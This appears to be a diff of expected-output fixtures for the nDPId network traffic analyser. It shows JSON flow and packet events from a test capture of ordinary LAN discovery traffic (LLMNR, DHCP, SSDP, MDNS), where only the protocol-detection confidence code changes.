00848{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":773,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":8,"flow_packet_id":2,"flow_last_seen":1470104395657,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":342,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":342,"pkt_l4_len":308,"thread_ts_msec":1470104395657,"pkt":"\/\/\/\/\/\/\/\/TF4M6gNlCABFAAFIAAAAABARqaYAAAAA\/\/\/\/\/wBEAEMBNLOUAQEGALkL8pMAEIAAAAAAAAAAAAAAAAAAAAAAAExeDOoDZQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABjglNjNQEBPQcBTF4M6gNlNwYBAwYPLCH\/AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"} 00589{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":784,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":72,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1470104396888,"flow_last_seen":1470104396888,"flow_idle_time":200000,"flow_min_l4_payload_len":26,"flow_max_l4_payload_len":26,"flow_tot_l4_payload_len":26,"flow_avg_l4_payload_len":26,"midstream":0,"thread_ts_msec":1470104396888,"l3_proto":"ip6","src_ip":"fe80::4568:efbc:40b1:1346","dst_ip":"ff02::1:3","src_port":50194,"dst_port":5355,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00498{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":784,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":72,"flow_packet_id":1,"flow_last_seen":1470104396888,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":88,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":88,"pkt_l4_len":34,"thread_ts_msec":1470104396888,"pkt":"MzMAAQADSNIkYwreht1gAAAAACIRAf6AAAAAAAAARWjvvECxE0b\/AgAAAAAAAAAAAAAAAQADxBIU6wAiAfRVcwAAAAEAAAAAAAAIa2V2aW4tUEMAAP8AAQ=="} -00649{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":784,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":72,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1470104396888,"flow_last_seen":1470104396888,"flow_idle_time":200000,"flow_min_l4_payload_len":26,"flow_max_l4_payload_len":26,"flow_tot_l4_payload_len":26,"flow_avg_l4_payload_len":26,"midstream":0,"thread_ts_msec":1470104396888,"l3_proto":"ip6","src_ip":"fe80::4568:efbc:40b1:1346","dst_ip":"ff02::1:3","src_port":50194,"dst_port":5355,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"LLMNR","breed":"Acceptable","category":"Network"}} +00649{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":784,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":72,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1470104396888,"flow_last_seen":1470104396888,"flow_idle_time":200000,"flow_min_l4_payload_len":26,"flow_max_l4_payload_len":26,"flow_tot_l4_payload_len":26,"flow_avg_l4_payload_len":26,"midstream":0,"thread_ts_msec":1470104396888,"l3_proto":"ip6","src_ip":"fe80::4568:efbc:40b1:1346","dst_ip":"ff02::1:3","src_port":50194,"dst_port":5355,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"LLMNR","breed":"Acceptable","category":"Network"}} 00578{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":785,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":73,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1470104396889,"flow_last_seen":1470104396889,"flow_idle_time":200000,"flow_min_l4_payload_len":26,"flow_max_l4_payload_len":26,"flow_tot_l4_payload_len":26,"flow_avg_l4_payload_len":26,"midstream":0,"thread_ts_msec":1470104396889,"l3_proto":"ip4","src_ip":"192.168.5.41","dst_ip":"224.0.0.252","src_port":54470,"dst_port":5355,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00470{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":785,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":73,"flow_packet_id":1,"flow_last_seen":1470104396889,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":68,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":68,"pkt_l4_len":34,"thread_ts_msec":1470104396889,"pkt":"AQBeAAD8SNIkYwreCABFAAA2fi0AAAERlLzAqAUp4AAA\/NTGFOsAItEVVXMAAAABAAAAAAAACGtldmluLVBDAAD\/AAE="} -00638{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":785,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":73,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1470104396889,"flow_last_seen":1470104396889,"flow_idle_time":200000,"flow_min_l4_payload_len":26,"flow_max_l4_payload_len":26,"flow_tot_l4_payload_len":26,"flow_avg_l4_payload_len":26,"midstream":0,"thread_ts_msec":1470104396889,"l3_proto":"ip4","src_ip":"192.168.5.41","dst_ip":"224.0.0.252","src_port":54470,"dst_port":5355,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"LLMNR","breed":"Acceptable","category":"Network"}} +00638{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":785,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":73,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1470104396889,"flow_last_seen":1470104396889,"flow_idle_time":200000,"flow_min_l4_payload_len":26,"flow_max_l4_payload_len":26,"flow_tot_l4_payload_len":26,"flow_avg_l4_payload_len":26,"midstream":0,"thread_ts_msec":1470104396889,"l3_proto":"ip4","src_ip":"192.168.5.41","dst_ip":"224.0.0.252","src_port":54470,"dst_port":5355,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"LLMNR","breed":"Acceptable","category":"Network"}} 00498{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":786,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":72,"flow_packet_id":2,"flow_last_seen":1470104396987,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":88,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":88,"pkt_l4_len":34,"thread_ts_msec":1470104396987,"pkt":"MzMAAQADSNIkYwreht1gAAAAACIRAf6AAAAAAAAARWjvvECxE0b\/AgAAAAAAAAAAAAAAAQADxBIU6wAiAfRVcwAAAAEAAAAAAAAIa2V2aW4tUEMAAP8AAQ=="} 00470{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":787,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":73,"flow_packet_id":2,"flow_last_seen":1470104396987,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":68,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":68,"pkt_l4_len":34,"thread_ts_msec":1470104396987,"pkt":"AQBeAAD8SNIkYwreCABFAAA2fi4AAAERlLvAqAUp4AAA\/NTGFOsAItEVVXMAAAABAAAAAAAACGtldmluLVBDAAD\/AAE="} 00580{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":791,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":74,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1470104397091,"flow_last_seen":1470104397091,"flow_idle_time":200000,"flow_min_l4_payload_len":300,"flow_max_l4_payload_len":300,"flow_tot_l4_payload_len":300,"flow_avg_l4_payload_len":300,"midstream":0,"thread_ts_msec":1470104397091,"l3_proto":"ip4","src_ip":"192.168.5.9","dst_ip":"255.255.255.255","src_port":68,"dst_port":67,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00850{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":791,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":74,"flow_packet_id":1,"flow_last_seen":1470104397091,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":342,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":342,"pkt_l4_len":308,"thread_ts_msec":1470104397091,"pkt":"\/\/\/\/\/\/\/\/cPGh+Cr9CABFAAFIAzMAAIARcMHAqAUJ\/\/\/\/\/wBEAEMBND1aAQEGAPwPedgAAIAAwKgFCQAAAAAAAAAAAAAAAHDxofgq\/QAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABjglNjNQEIPQcBcPGh+Cr9DAlKb2FubmEtUEM8CE1TRlQgNS4wNw0BDwMGLC4vHyF5+Sv8\/wAAAAAAAAAAAAAA"} -00752{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":791,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":74,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1470104397091,"flow_last_seen":1470104397091,"flow_idle_time":200000,"flow_min_l4_payload_len":300,"flow_max_l4_payload_len":300,"flow_tot_l4_payload_len":300,"flow_avg_l4_payload_len":300,"midstream":0,"thread_ts_msec":1470104397091,"l3_proto":"ip4","src_ip":"192.168.5.9","dst_ip":"255.255.255.255","src_port":68,"dst_port":67,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DHCP","breed":"Acceptable","category":"Network"},"dhcp": {"hostname":"joanna-pc","fingerprint":"1,15,3,6,44,46,47,31,33,121,249,43,252","class_ident":"MSFT 5.0"}} +00752{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":791,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":74,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1470104397091,"flow_last_seen":1470104397091,"flow_idle_time":200000,"flow_min_l4_payload_len":300,"flow_max_l4_payload_len":300,"flow_tot_l4_payload_len":300,"flow_avg_l4_payload_len":300,"midstream":0,"thread_ts_msec":1470104397091,"l3_proto":"ip4","src_ip":"192.168.5.9","dst_ip":"255.255.255.255","src_port":68,"dst_port":67,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DHCP","breed":"Acceptable","category":"Network"},"dhcp": {"hostname":"joanna-pc","fingerprint":"1,15,3,6,44,46,47,31,33,121,249,43,252","class_ident":"MSFT 5.0"}} 00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":803,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":75,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1470104397807,"flow_last_seen":1470104397807,"flow_idle_time":200000,"flow_min_l4_payload_len":137,"flow_max_l4_payload_len":137,"flow_tot_l4_payload_len":137,"flow_avg_l4_payload_len":137,"midstream":0,"thread_ts_msec":1470104397807,"l3_proto":"ip4","src_ip":"192.168.5.48","dst_ip":"239.255.255.250","src_port":49701,"dst_port":1900,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00624{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":803,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":75,"flow_packet_id":1,"flow_last_seen":1470104397807,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":179,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":179,"pkt_l4_len":145,"thread_ts_msec":1470104397807,"pkt":"AQBef\/\/6bEAIlAI6CABFAAClrzIAAAERVEPAqAUw7\/\/\/+sIlB2wAkY1JTS1TRUFSQ0ggKiBIVFRQLzEuMQ0KSG9zdDogMjM5LjI1NS4yNTUuMjUwOjE5MDANClNUOiB1cm46c2NoZW1hcy11cG5wLW9yZzpkZXZpY2U6SW50ZXJuZXRHYXRld2F5RGV2aWNlOjENCk1hbjogInNzZHA6ZGlzY292ZXIiDQpNWDogMw0KDQo="} -00644{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":803,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":75,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1470104397807,"flow_last_seen":1470104397807,"flow_idle_time":200000,"flow_min_l4_payload_len":137,"flow_max_l4_payload_len":137,"flow_tot_l4_payload_len":137,"flow_avg_l4_payload_len":137,"midstream":0,"thread_ts_msec":1470104397807,"l3_proto":"ip4","src_ip":"192.168.5.48","dst_ip":"239.255.255.250","src_port":49701,"dst_port":1900,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"SSDP","breed":"Acceptable","category":"System"}} +00644{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":803,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":75,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1470104397807,"flow_last_seen":1470104397807,"flow_idle_time":200000,"flow_min_l4_payload_len":137,"flow_max_l4_payload_len":137,"flow_tot_l4_payload_len":137,"flow_avg_l4_payload_len":137,"midstream":0,"thread_ts_msec":1470104397807,"l3_proto":"ip4","src_ip":"192.168.5.48","dst_ip":"239.255.255.250","src_port":49701,"dst_port":1900,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"SSDP","breed":"Acceptable","category":"System"}} 00456{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":810,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":5,"flow_packet_id":2,"flow_last_seen":1470104398314,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":60,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":60,"pkt_l4_len":20,"thread_ts_msec":1470104398314,"pkt":"TF4M6gNlYMVHBbyMCABFAAAoA95AAEAGLsvAqAUQROn9hdFlAFAG4xw4xV6fSlAUEAE+LgAA8Q52cgJF"} 00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":812,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":76,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1470104398832,"flow_last_seen":1470104398832,"flow_idle_time":200000,"flow_min_l4_payload_len":40,"flow_max_l4_payload_len":40,"flow_tot_l4_payload_len":40,"flow_avg_l4_payload_len":40,"midstream":0,"thread_ts_msec":1470104398832,"l3_proto":"ip4","src_ip":"192.168.5.64","dst_ip":"224.0.0.251","src_port":5353,"dst_port":5353,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00489{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":812,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":76,"flow_packet_id":1,"flow_last_seen":1470104398832,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":82,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":82,"pkt_l4_len":48,"thread_ts_msec":1470104398832,"pkt":"AQBeAAD7ZMwunDzJCABFAABEo69AAP8RMRXAqAVA4AAA+xTpFOkAMOS\/AAAAAAABAAAAAAAAC19nb29nbGVjYXN0BF90Y3AFbG9jYWwAAAwAAQ=="} -00680{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":812,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":76,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1470104398832,"flow_last_seen":1470104398832,"flow_idle_time":200000,"flow_min_l4_payload_len":40,"flow_max_l4_payload_len":40,"flow_tot_l4_payload_len":40,"flow_avg_l4_payload_len":40,"midstream":0,"thread_ts_msec":1470104398832,"l3_proto":"ip4","src_ip":"192.168.5.64","dst_ip":"224.0.0.251","src_port":5353,"dst_port":5353,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"MDNS","breed":"Acceptable","category":"Network"},"mdns": {"answer":"_googlecast._tcp.local"}} +00680{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":812,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":76,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1470104398832,"flow_last_seen":1470104398832,"flow_idle_time":200000,"flow_min_l4_payload_len":40,"flow_max_l4_payload_len":40,"flow_tot_l4_payload_len":40,"flow_avg_l4_payload_len":40,"midstream":0,"thread_ts_msec":1470104398832,"l3_proto":"ip4","src_ip":"192.168.5.64","dst_ip":"224.0.0.251","src_port":5353,"dst_port":5353,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"MDNS","breed":"Acceptable","category":"Network"},"mdns": {"answer":"_googlecast._tcp.local"}} 00583{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":813,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":77,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1470104398932,"flow_last_seen":1470104398932,"flow_idle_time":200000,"flow_min_l4_payload_len":40,"flow_max_l4_payload_len":40,"flow_tot_l4_payload_len":40,"flow_avg_l4_payload_len":40,"midstream":0,"thread_ts_msec":1470104398932,"l3_proto":"ip4","src_ip":"192.168.2.186","dst_ip":"255.255.255.255","src_port":32768,"dst_port":1947,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00501{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":813,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":77,"flow_packet_id":1,"flow_last_seen":1470104398932,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":82,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":82,"pkt_l4_len":48,"thread_ts_msec":1470104398932,"pkt":"\/\/\/\/\/\/\/\/AAK2Qbs6CABFAABEAABAAEARd0fAqAK6\/\/\/\/\/4AAB5sAMBr8aWNSVlNvVTlBQUJYWldKRFlXeHNBSFZ0Ukc5c2IzSlRhWFJCYldVQQ=="} 00578{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":820,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":78,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1470104399652,"flow_last_seen":1470104399652,"flow_idle_time":200000,"flow_min_l4_payload_len":28,"flow_max_l4_payload_len":28,"flow_tot_l4_payload_len":28,"flow_avg_l4_payload_len":28,"midstream":0,"thread_ts_msec":1470104399652,"l3_proto":"ip4","src_ip":"192.168.5.48","dst_ip":"224.0.0.252","src_port":59797,"dst_port":5355,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00473{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":820,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":78,"flow_packet_id":1,"flow_last_seen":1470104399652,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":70,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":70,"pkt_l4_len":36,"thread_ts_msec":1470104399652,"pkt":"AQBeAAD8bEAIlAI6CABFAAA4QZsAAAER0UXAqAUw4AAA\/OmVFOsAJO3eTL0AAAABAAAAAAAACkthc3Blci1tYWMAAP8AAQ=="} -00638{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":820,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":78,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1470104399652,"flow_last_seen":1470104399652,"flow_idle_time":200000,"flow_min_l4_payload_len":28,"flow_max_l4_payload_len":28,"flow_tot_l4_payload_len":28,"flow_avg_l4_payload_len":28,"midstream":0,"thread_ts_msec":1470104399652,"l3_proto":"ip4","src_ip":"192.168.5.48","dst_ip":"224.0.0.252","src_port":59797,"dst_port":5355,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"LLMNR","breed":"Acceptable","category":"Network"}} +00638{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":820,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":78,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1470104399652,"flow_last_seen":1470104399652,"flow_idle_time":200000,"flow_min_l4_payload_len":28,"flow_max_l4_payload_len":28,"flow_tot_l4_payload_len":28,"flow_avg_l4_payload_len":28,"midstream":0,"thread_ts_msec":1470104399652,"l3_proto":"ip4","src_ip":"192.168.5.48","dst_ip":"224.0.0.252","src_port":59797,"dst_port":5355,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"LLMNR","breed":"Acceptable","category":"Network"}} 00587{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":824,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":79,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1470104399854,"flow_last_seen":1470104399854,"flow_idle_time":200000,"flow_min_l4_payload_len":100,"flow_max_l4_payload_len":100,"flow_tot_l4_payload_len":100,"flow_avg_l4_payload_len":100,"midstream":0,"thread_ts_msec":1470104399854,"l3_proto":"ip4","src_ip":"192.168.0.100","dst_ip":"255.255.255.255","src_port":50925,"dst_port":5678,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00584{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":824,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":79,"flow_packet_id":1,"flow_last_seen":1470104399854,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":142,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":142,"pkt_l4_len":108,"thread_ts_msec":1470104399854,"pkt":"\/\/\/\/\/\/\/\/TF4M6gOICABFAACAAABAAEAReWHAqABk\/\/\/\/\/8btFi4AbOgXAACpHQABAAZMXgzqA4gABQAFNE1OQVQABwAPNi4zNS4xIChzdGFibGUpAAgACE1pa3JvVGlrAAoABIOWJAAACwAJTjUzOC1HMDRVAAwABlJCNDUwRwAOAAEAABAABmV0aGVyMg=="} 00578{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":825,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":80,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1470104399958,"flow_last_seen":1470104399958,"flow_idle_time":200000,"flow_min_l4_payload_len":26,"flow_max_l4_payload_len":26,"flow_tot_l4_payload_len":26,"flow_avg_l4_payload_len":26,"midstream":0,"thread_ts_msec":1470104399958,"l3_proto":"ip4","src_ip":"192.168.5.57","dst_ip":"224.0.0.252","src_port":65150,"dst_port":5355,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00470{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":825,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":80,"flow_packet_id":1,"flow_last_seen":1470104399958,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":68,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":68,"pkt_l4_len":34,"thread_ts_msec":1470104399958,"pkt":"AQBeAAD8GF4PUugBCABFAAA2MRAAAAER4cnAqAU54AAA\/P5+FOsAIr4lNLsAAAABAAAAAAAACFVzaGVyLVBDAAD\/AAE="} -00638{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":825,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":80,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1470104399958,"flow_last_seen":1470104399958,"flow_idle_time":200000,"flow_min_l4_payload_len":26,"flow_max_l4_payload_len":26,"flow_tot_l4_payload_len":26,"flow_avg_l4_payload_len":26,"midstream":0,"thread_ts_msec":1470104399958,"l3_proto":"ip4","src_ip":"192.168.5.57","dst_ip":"224.0.0.252","src_port":65150,"dst_port":5355,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"LLMNR","breed":"Acceptable","category":"Network"}} +00638{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":825,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":80,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1470104399958,"flow_last_seen":1470104399958,"flow_idle_time":200000,"flow_min_l4_payload_len":26,"flow_max_l4_payload_len":26,"flow_tot_l4_payload_len":26,"flow_avg_l4_payload_len":26,"midstream":0,"thread_ts_msec":1470104399958,"l3_proto":"ip4","src_ip":"192.168.5.57","dst_ip":"224.0.0.252","src_port":65150,"dst_port":5355,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"LLMNR","breed":"Acceptable","category":"Network"}} 00588{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":826,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":81,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1470104399959,"flow_last_seen":1470104399959,"flow_idle_time":200000,"flow_min_l4_payload_len":29,"flow_max_l4_payload_len":29,"flow_tot_l4_payload_len":29,"flow_avg_l4_payload_len":29,"midstream":0,"thread_ts_msec":1470104399959,"l3_proto":"ip6","src_ip":"fe80::e034:7be:d8f9:6197","dst_ip":"ff02::1:3","src_port":62756,"dst_port":5355,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00502{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":826,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":81,"flow_packet_id":1,"flow_last_seen":1470104399959,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":91,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":91,"pkt_l4_len":37,"thread_ts_msec":1470104399959,"pkt":"MzMAAQADuKxv2MGbht1gAAAAACURAf6AAAAAAAAA4DQHvtj5YZf\/AgAAAAAAAAAAAAAAAQAD9SQU6wAlorgrvQAAAAEAAAAAAAALY2hhcm1pbmctUEMAAP8AAQ=="} -00648{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":826,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":81,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1470104399959,"flow_last_seen":1470104399959,"flow_idle_time":200000,"flow_min_l4_payload_len":29,"flow_max_l4_payload_len":29,"flow_tot_l4_payload_len":29,"flow_avg_l4_payload_len":29,"midstream":0,"thread_ts_msec":1470104399959,"l3_proto":"ip6","src_ip":"fe80::e034:7be:d8f9:6197","dst_ip":"ff02::1:3","src_port":62756,"dst_port":5355,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"LLMNR","breed":"Acceptable","category":"Network"}} +00648{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":826,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":81,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1470104399959,"flow_last_seen":1470104399959,"flow_idle_time":200000,"flow_min_l4_payload_len":29,"flow_max_l4_payload_len":29,"flow_tot_l4_payload_len":29,"flow_avg_l4_payload_len":29,"midstream":0,"thread_ts_msec":1470104399959,"l3_proto":"ip6","src_ip":"fe80::e034:7be:d8f9:6197","dst_ip":"ff02::1:3","src_port":62756,"dst_port":5355,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"LLMNR","breed":"Acceptable","category":"Network"}} 00578{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":827,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":82,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1470104399959,"flow_last_seen":1470104399959,"flow_idle_time":200000,"flow_min_l4_payload_len":29,"flow_max_l4_payload_len":29,"flow_tot_l4_payload_len":29,"flow_avg_l4_payload_len":29,"midstream":0,"thread_ts_msec":1470104399959,"l3_proto":"ip4","src_ip":"192.168.5.50","dst_ip":"224.0.0.252","src_port":62756,"dst_port":5355,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":827,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":82,"flow_packet_id":1,"flow_last_seen":1470104399959,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":71,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":71,"pkt_l4_len":37,"thread_ts_msec":1470104399959,"pkt":"AQBeAAD8uKxv2MGbCABFAAA5S7YAAAERxyfAqAUy4AAA\/PUkFOsAJRvtK70AAAABAAAAAAAAC2NoYXJtaW5nLVBDAAD\/AAE="} 